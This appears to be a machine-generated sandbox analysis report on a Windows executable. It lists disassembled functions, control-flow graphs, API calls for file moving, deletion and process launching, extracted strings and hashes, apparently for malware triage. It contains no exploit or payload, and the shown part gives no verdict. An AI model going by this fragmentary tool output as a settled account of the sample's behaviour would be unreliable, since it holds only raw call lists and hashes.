                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                        • String ID: (=0$,<0$,@0$0?0$0A0$4B0$8>0$D=0$DXGIDebug.dll$H?0$H@0$HA0$P>0$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$T=0$`@0$d?0$dA0$dwmapi.dll$h=0$h>0$kernel32$uxtheme.dll$|<0$|?0$|@0$<0$>0$?0$@0$A0
                                        • API String ID: 1207345701-2421637091
                                        • Opcode ID: 9c16b889e855b51321cc2a2b2997095f013ee3260297a9e7f25aa9a9534d87a6
                                        • Instruction ID: a17d8a587442b0dcfd7c3fdd7ce96b6419a6bb5690c294c6720606367e4baec4
                                        • Opcode Fuzzy Hash: 9c16b889e855b51321cc2a2b2997095f013ee3260297a9e7f25aa9a9534d87a6
                                        • Instruction Fuzzy Hash: DBD184B505A385ABD322DF51C8A8B9FBBECFF85704F50491EF28596190C7B08649CB62
                                        Function 002EC73F Relevance: 51.2, APIs: 23, Strings: 6, Instructions: 428windowCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 348 2ec73f-2ec757 call 2eeb78 call 2eec50 353 2ed40d-2ed418 348->353 354 2ec75d-2ec787 call 2eb314 348->354 354->353 357 2ec78d-2ec792 354->357 358 2ec793-2ec7a1 357->358 359 2ec7a2-2ec7b7 call 2eaf98 358->359 362 2ec7b9 359->362 363 2ec7bb-2ec7d0 call 2e1fbb 362->363 366 2ec7dd-2ec7e0 363->366 367 2ec7d2-2ec7d6 363->367 369 2ed3d9-2ed404 call 2eb314 366->369 370 2ec7e6 366->370 367->363 368 2ec7d8 367->368 368->369 369->358 381 2ed40a-2ed40c 369->381 372 2ec9be-2ec9c0 370->372 373 2eca5f-2eca61 370->373 374 2eca7c-2eca7e 370->374 375 2ec7ed-2ec7f0 370->375 372->369 379 2ec9c6-2ec9d2 372->379 373->369 377 2eca67-2eca77 SetWindowTextW 373->377 374->369 378 2eca84-2eca8b 374->378 375->369 380 2ec7f6-2ec850 call 2ea64d call 2dbdf3 call 2da544 call 2da67e call 2d6edb 375->380 377->369 378->369 382 2eca91-2ecaaa 378->382 383 2ec9e6-2ec9eb 379->383 384 2ec9d4-2ec9e5 call 2f7686 379->384 436 2ec98f-2ec9a4 call 2da5d1 380->436 381->353 386 2ecaac 382->386 387 2ecab2-2ecac0 call 2f3e13 382->387 390 2ec9ed-2ec9f3 383->390 391 2ec9f5-2eca00 call 2eb48e 383->391 384->383 386->387 387->369 404 2ecac6-2ecacf 387->404 396 2eca05-2eca07 390->396 391->396 398 2eca09-2eca10 call 2f3e13 396->398 399 2eca12-2eca32 call 2f3e13 call 2f3e3e 396->399 398->399 425 2eca4b-2eca4d 399->425 426 2eca34-2eca3b 399->426 409 2ecaf8-2ecafb 404->409 410 2ecad1-2ecad5 404->410 412 2ecbe0-2ecbee call 2e0602 409->412 413 2ecb01-2ecb04 409->413 410->413 415 2ecad7-2ecadf 410->415 427 2ecbf0-2ecc04 call 2f279b 412->427 418 2ecb06-2ecb0b 413->418 419 2ecb11-2ecb2c 413->419 415->369 416 2ecae5-2ecaf3 call 2e0602 415->416 416->427 418->412 418->419 437 2ecb2e-2ecb68 419->437 438 2ecb76-2ecb7d 419->438 425->369 428 2eca53-2eca5a call 2f3e2e 425->428 432 2eca3d-2eca3f 426->432 433 2eca42-2eca4a call 2f7686 426->433 447 2ecc06-2ecc0a 427->447 448 2ecc11-2ecc62 call 2e0602 call 2eb1be GetDlgItem SetWindowTextW SendMessageW call 2f3e49 427->448 428->369 432->433 433->425 454 2ec9aa-2ec9b9 call 2da55a 436->454 455 2ec855-2ec869 SetFileAttributesW 436->455 471 2ecb6c-2ecb6e 437->471 472 2ecb6a 437->472 440 2ecb7f-2ecb97 call 2f3e13 438->440 441 2ecbab-2ecbce call 2f3e13 * 2 438->441 440->441 458 2ecb99-2ecba6 call 2e05da 440->458 441->427 476 2ecbd0-2ecbde call 2e05da 441->476 447->448 453 2ecc0c-2ecc0e 447->453 482 2ecc67-2ecc6b 448->482 453->448 454->369 460 2ec90f-2ec91f GetFileAttributesW 455->460 461 2ec86f-2ec8a2 call 2db991 call 2db690 call 2f3e13 455->461 458->441 460->436 469 2ec921-2ec930 DeleteFileW 460->469 492 2ec8a4-2ec8b3 call 2f3e13 461->492 493 2ec8b5-2ec8c3 call 2dbdb4 461->493 469->436 475 2ec932-2ec935 469->475 471->438 472->471 479 2ec939-2ec965 call 2d4092 GetFileAttributesW 475->479 476->427 488 2ec937-2ec938 479->488 489 2ec967-2ec97d MoveFileW 479->489 482->369 486 2ecc71-2ecc85 SendMessageW 482->486 486->369 488->479 489->436 491 2ec97f-2ec989 MoveFileExW 489->491 491->436 492->493 498 2ec8c9-2ec908 call 2f3e13 call 2efff0 492->498 493->454 493->498 498->460
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 002EC744
                                          • Part of subcall function 002EB314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 002EB3FB
                                          • Part of subcall function 002EAF98: _wcschr.LIBVCRUNTIME ref: 002EB033
                                        • _wcslen.LIBCMT ref: 002ECA0A
                                        • _wcslen.LIBCMT ref: 002ECA13
                                        • SetWindowTextW.USER32(?,?), ref: 002ECA71
                                        • _wcslen.LIBCMT ref: 002ECAB3
                                        • _wcsrchr.LIBVCRUNTIME ref: 002ECBFB
                                        • GetDlgItem.USER32(?,00000066), ref: 002ECC36
                                        • SetWindowTextW.USER32(00000000,?), ref: 002ECC46
                                        • SendMessageW.USER32(00000000,00000143,00000000,0031A472), ref: 002ECC54
                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 002ECC7F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcschr_wcsrchr
                                        • String ID: %s.%d.tmp$<br>$<.$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$.
                                        • API String ID: 986293930-2128744728
                                        • Opcode ID: 8dbeb9967c5222f9b148a8e9cdb6e608013896c9127eebd36a0de6e803b89762
                                        • Instruction ID: dd0262d869d9972d2da10f255bc224f4b0b26a75151dc84278c1bd32990633c7
                                        • Opcode Fuzzy Hash: 8dbeb9967c5222f9b148a8e9cdb6e608013896c9127eebd36a0de6e803b89762
                                        • Instruction Fuzzy Hash: CDE1A672950259AADF25EBA1DC85EEF73BCAF04350F9040A6F609E3140EB749F958F60
                                        Function 002DDA67 Relevance: 26.9, APIs: 5, Strings: 10, Instructions: 663COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 002DDA70
                                        • _wcschr.LIBVCRUNTIME ref: 002DDA91
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 002DDAAC
                                          • Part of subcall function 002DC29A: _wcslen.LIBCMT ref: 002DC2A2
                                          • Part of subcall function 002E05DA: _wcslen.LIBCMT ref: 002E05E0
                                          • Part of subcall function 002E1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,002DBAE9,00000000,?,?,?,00010456), ref: 002E1BA0
                                        • _wcslen.LIBCMT ref: 002DDDE9
                                        • __fprintf_l.LIBCMT ref: 002DDF1C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
                                        • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a$90
                                        • API String ID: 557298264-2587909306
                                        • Opcode ID: 9f6ae131b8b8e81daafdfd4cdde88cbd417b773250d2d1c539514beba34007c5
                                        • Instruction ID: a3197873c6c743d50e175d015407ed0a838ff9ceaed971fe5819ea2f61bf8a28
                                        • Opcode Fuzzy Hash: 9f6ae131b8b8e81daafdfd4cdde88cbd417b773250d2d1c539514beba34007c5
                                        • Instruction Fuzzy Hash: 1732F271A20209ABCF25EF68C845BEA77A8FF14300F41016BFA059B381E7B1DDA5CB50
                                        Function 002ED4D4 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97windowCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 002EB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 002EB579
                                          • Part of subcall function 002EB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 002EB58A
                                          • Part of subcall function 002EB568: IsDialogMessageW.USER32(00010456,?), ref: 002EB59E
                                          • Part of subcall function 002EB568: TranslateMessage.USER32(?), ref: 002EB5AC
                                          • Part of subcall function 002EB568: DispatchMessageW.USER32(?), ref: 002EB5B6
                                        • GetDlgItem.USER32(00000068,0032FCB8), ref: 002ED4E8
                                        • ShowWindow.USER32(00000000,00000005,?,?,?,002EAF07,00000001,?,?,002EB7B9,0030506C,0032FCB8,0032FCB8,00001000,00000000,00000000), ref: 002ED510
                                        • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 002ED51B
                                        • SendMessageW.USER32(00000000,000000C2,00000000,003035F4), ref: 002ED529
                                        • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 002ED53F
                                        • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 002ED559
                                        • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 002ED59D
                                        • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 002ED5AB
                                        • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 002ED5BA
                                        • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 002ED5E1
                                        • SendMessageW.USER32(00000000,000000C2,00000000,003043F4), ref: 002ED5F0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                        • String ID: \
                                        • API String ID: 3569833718-2967466578
                                        • Opcode ID: 2e238dfa77d6822f1309475287e9f46fab7eb1594695f235130c76fb11c9b62d
                                        • Instruction ID: 58eab8b079fac8e1b02f173159e1f6fc3377eff22ef50f65b4fb0c5f69af21eb
                                        • Opcode Fuzzy Hash: 2e238dfa77d6822f1309475287e9f46fab7eb1594695f235130c76fb11c9b62d
                                        • Instruction Fuzzy Hash: C231C471145342BFE302DF21DC8AFAB7FACEB86704F004609F652961D0DB659A048B76
                                        Function 002ED78F Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 184COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 838 2ed78f-2ed7a7 call 2eec50 841 2ed7ad-2ed7b9 call 2f3e13 838->841 842 2ed9e8-2ed9f0 838->842 841->842 845 2ed7bf-2ed7e7 call 2efff0 841->845 848 2ed7e9 845->848 849 2ed7f1-2ed7ff 845->849 848->849 850 2ed812-2ed818 849->850 851 2ed801-2ed804 849->851 852 2ed85b-2ed85e 850->852 853 2ed808-2ed80e 851->853 852->853 854 2ed860-2ed866 852->854 855 2ed837-2ed844 853->855 856 2ed810 853->856 860 2ed86d-2ed86f 854->860 861 2ed868-2ed86b 854->861 858 2ed84a-2ed84e 855->858 859 2ed9c0-2ed9c2 855->859 857 2ed822-2ed82c 856->857 862 2ed82e 857->862 863 2ed81a-2ed820 857->863 864 2ed9c6 858->864 865 2ed854-2ed859 858->865 859->864 866 2ed882-2ed898 call 2db92d 860->866 867 2ed871-2ed878 860->867 861->860 861->866 862->855 863->857 868 2ed830-2ed833 863->868 872 2ed9cf 864->872 865->852 873 2ed89a-2ed8a7 call 2e1fbb 866->873 874 2ed8b1-2ed8bc call 2da231 866->874 867->866 869 2ed87a 867->869 868->855 869->866 875 2ed9d6-2ed9d8 872->875 873->874 883 2ed8a9 873->883 884 2ed8be-2ed8d5 call 2db6c4 874->884 885 2ed8d9-2ed8dd 874->885 878 2ed9da-2ed9dc 875->878 879 2ed9e7 875->879 878->879 882 2ed9de-2ed9e1 ShowWindow 878->882 879->842 882->879 883->874 884->885 888 2ed8e4-2ed8e6 885->888 888->879 889 2ed8ec-2ed8f9 888->889 890 2ed90c-2ed90e 889->890 891 2ed8fb-2ed902 889->891 893 2ed925-2ed944 call 2edc3b 890->893 894 2ed910-2ed919 890->894 891->890 892 2ed904-2ed90a 891->892 892->890 895 2ed97b-2ed987 CloseHandle 892->895 893->895 908 2ed946-2ed94e 893->908 894->893 902 2ed91b-2ed923 ShowWindow 894->902 896 2ed998-2ed9a6 895->896 897 2ed989-2ed996 call 2e1fbb 895->897 896->875 901 2ed9a8-2ed9aa 896->901 897->872 897->896 901->875 905 2ed9ac-2ed9b2 901->905 902->893 905->875 907 2ed9b4-2ed9be 905->907 907->875 908->895 909 2ed950-2ed961 GetExitCodeProcess 908->909 909->895 910 2ed963-2ed96d 909->910 911 2ed96f 910->911 912 2ed974 910->912 911->912 912->895
                                        APIs
                                        • _wcslen.LIBCMT ref: 002ED7AE
                                        • ShellExecuteExW.SHELL32(?), ref: 002ED8DE
                                        • ShowWindow.USER32(?,00000000), ref: 002ED91D
                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 002ED959
                                        • CloseHandle.KERNEL32(?), ref: 002ED97F
                                        • ShowWindow.USER32(?,00000001), ref: 002ED9E1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                                        • String ID: .exe$.inf$PDu<.$h.$r.
                                        • API String ID: 36480843-1236758763
                                        • Opcode ID: 060d4ab2d0aff3c19ae474694c842fe7bda49fa423faf16578d916550df9e6b0
                                        • Instruction ID: 8caff47ee9084f3b7ac852260986a4a696c903b96179487033028c64ec94659e
                                        • Opcode Fuzzy Hash: 060d4ab2d0aff3c19ae474694c842fe7bda49fa423faf16578d916550df9e6b0
                                        • Instruction Fuzzy Hash: A75105700A43C19AEB31DF26DC40BABBBE8AF46744F84481EF9C597192D7708DA5CB52
                                        Function 002FA95B Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 913 2fa95b-2fa974 914 2fa98a-2fa98f 913->914 915 2fa976-2fa986 call 2fef4c 913->915 917 2fa99c-2fa9c0 MultiByteToWideChar 914->917 918 2fa991-2fa999 914->918 915->914 923 2fa988 915->923 920 2fa9c6-2fa9d2 917->920 921 2fab53-2fab66 call 2efbbc 917->921 918->917 924 2faa26 920->924 925 2fa9d4-2fa9e5 920->925 923->914 929 2faa28-2faa2a 924->929 926 2fa9e7-2fa9f6 call 302010 925->926 927 2faa04-2faa15 call 2f8e06 925->927 932 2fab48 926->932 938 2fa9fc-2faa02 926->938 927->932 939 2faa1b 927->939 929->932 933 2faa30-2faa43 MultiByteToWideChar 929->933 937 2fab4a-2fab51 call 2fabc3 932->937 933->932 936 2faa49-2faa5b call 2faf6c 933->936 943 2faa60-2faa64 936->943 937->921 942 2faa21-2faa24 938->942 939->942 942->929 943->932 945 2faa6a-2faa71 943->945 946 2faaab-2faab7 945->946 947 2faa73-2faa78 945->947 949 2faab9-2faaca 946->949 950 2fab03 946->950 947->937 948 2faa7e-2faa80 947->948 948->932 951 2faa86-2faaa0 call 2faf6c 948->951 953 2faacc-2faadb call 302010 949->953 954 2faae5-2faaf6 call 2f8e06 949->954 952 2fab05-2fab07 950->952 951->937 965 2faaa6 951->965 956 2fab09-2fab22 call 2faf6c 952->956 957 2fab41-2fab47 call 2fabc3 952->957 953->957 968 2faadd-2faae3 953->968 954->957 969 2faaf8 954->969 956->957 971 2fab24-2fab2b 956->971 957->932 965->932 970 2faafe-2fab01 968->970 969->970 970->952 972 2fab2d-2fab2e 971->972 973 2fab67-2fab6d 971->973 974 2fab2f-2fab3f WideCharToMultiByte 972->974 973->974 974->957 975 2fab6f-2fab76 call 2fabc3 974->975 975->937
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,002F5695,002F5695,?,?,?,002FABAC,00000001,00000001,2DE85006), ref: 002FA9B5
                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,002FABAC,00000001,00000001,2DE85006,?,?,?), ref: 002FAA3B
                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 002FAB35
                                        • __freea.LIBCMT ref: 002FAB42
                                          • Part of subcall function 002F8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,002FCA2C,00000000,?,002F6CBE,?,00000008,?,002F91E0,?,?,?), ref: 002F8E38
                                        • __freea.LIBCMT ref: 002FAB4B
                                        • __freea.LIBCMT ref: 002FAB70
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide__freea$AllocateHeap
                                        • String ID:
                                        • API String ID: 1414292761-0
                                        • Opcode ID: 6726a6e9d31a5444151a8e3ea2425e30c474d4e0dd862b3b2bc953acfbf2e784
                                        • Instruction ID: efa772ecfb0bf99d277dde5bd0f35cd9ce6176284cc4f9a26b8ab2265e35fe23
                                        • Opcode Fuzzy Hash: 6726a6e9d31a5444151a8e3ea2425e30c474d4e0dd862b3b2bc953acfbf2e784
                                        • Instruction Fuzzy Hash: CB51F5B263020AABDB258F64CD41EBBF7AAEB54794F154639FE08D6140DB70DC60CA51
                                        Function 002F3B72 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63COMMONLIBRARYCODE
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 978 2f3b72-2f3b7c 979 2f3bee-2f3bf1 978->979 980 2f3b7e-2f3b8c 979->980 981 2f3bf3 979->981 983 2f3b8e-2f3b91 980->983 984 2f3b95-2f3bb1 LoadLibraryExW 980->984 982 2f3bf5-2f3bf9 981->982 987 2f3c09-2f3c0b 983->987 988 2f3b93 983->988 985 2f3bfa-2f3c00 984->985 986 2f3bb3-2f3bbc GetLastError 984->986 985->987 991 2f3c02-2f3c03 FreeLibrary 985->991 989 2f3bbe-2f3bd3 call 2f6088 986->989 990 2f3be6-2f3be9 986->990 987->982 992 2f3beb 988->992 989->990 995 2f3bd5-2f3be4 LoadLibraryExW 989->995 990->992 991->987 992->979 995->985 995->990
                                        APIs
                                        • FreeLibrary.KERNEL32(00000000,?,?,?,002F3C35,?,?,00332088,00000000,?,002F3D60,00000004,InitializeCriticalSectionEx,00306394,InitializeCriticalSectionEx,00000000), ref: 002F3C03
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: FreeLibrary
                                        • String ID: api-ms-
                                        • API String ID: 3664257935-2084034818
                                        • Opcode ID: 745aa553be08cdd35d0cb80428a4efb76dfb08f732bcf86887ab1a3de3647404
                                        • Instruction ID: 09ce08ed42ef653b81efcfcac722325600b0cee190d01e211864e092fa63b7eb
                                        • Opcode Fuzzy Hash: 745aa553be08cdd35d0cb80428a4efb76dfb08f732bcf86887ab1a3de3647404
                                        • Instruction Fuzzy Hash: C911EB31A16229A7CB22CF68DC51B6DB79C9F017F4F150131EA11E7290D770EF1086D0
                                        Function 002EAC16 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34comCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 002E081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 002E0836
                                          • Part of subcall function 002E081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,002DF2D8,Crypt32.dll,00000000,002DF35C,?,?,002DF33E,?,?,?), ref: 002E0858
                                        • OleInitialize.OLE32(00000000), ref: 002EAC2F
                                        • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 002EAC66
                                        • SHGetMalloc.SHELL32(00318438), ref: 002EAC70
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                        • String ID: riched20.dll$3Ro
                                        • API String ID: 3498096277-3613677438
                                        • Opcode ID: 9e754468e94e68ba72d09105b7ce3e89bdb7809e6647eedcc4c6f843896ee851
                                        • Instruction ID: 0e4d6385b4dbb6483bb059dcac95f180dd95ad387d5969e76ad0ed334c911793
                                        • Opcode Fuzzy Hash: 9e754468e94e68ba72d09105b7ce3e89bdb7809e6647eedcc4c6f843896ee851
                                        • Instruction Fuzzy Hash: 48F06DB1D00209ABCB11AFAAD8899EFFFFCEF84700F00401AE855E2241CBB456458FA1
                                        Function 002D98E0 Relevance: 7.6, APIs: 5, Instructions: 111filetimeCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1000 2d98e0-2d9901 call 2eec50 1003 2d990c 1000->1003 1004 2d9903-2d9906 1000->1004 1006 2d990e-2d991f 1003->1006 1004->1003 1005 2d9908-2d990a 1004->1005 1005->1006 1007 2d9927-2d9931 1006->1007 1008 2d9921 1006->1008 1009 2d9936-2d9943 call 2d6edb 1007->1009 1010 2d9933 1007->1010 1008->1007 1013 2d994b-2d996a CreateFileW 1009->1013 1014 2d9945 1009->1014 1010->1009 1015 2d996c-2d998e GetLastError call 2dbb03 1013->1015 1016 2d99bb-2d99bf 1013->1016 1014->1013 1021 2d99c8-2d99cd 1015->1021 1022 2d9990-2d99b3 CreateFileW GetLastError 1015->1022 1017 2d99c3-2d99c6 1016->1017 1020 2d99d9-2d99de 1017->1020 1017->1021 1024 2d99ff-2d9a10 1020->1024 1025 2d99e0-2d99e3 1020->1025 1021->1020 1023 2d99cf 1021->1023 1022->1017 1026 2d99b5-2d99b9 1022->1026 1023->1020 1028 2d9a2e-2d9a39 1024->1028 1029 2d9a12-2d9a2a call 2e0602 1024->1029 1025->1024 1027 2d99e5-2d99f9 SetFileTime 1025->1027 1026->1017 1027->1024 1029->1028
                                        APIs
                                        • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,002D7760,?,00000005,?,00000011), ref: 002D995F
                                        • GetLastError.KERNEL32(?,?,002D7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 002D996C
                                        • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,002D7760,?,00000005,?), ref: 002D99A2
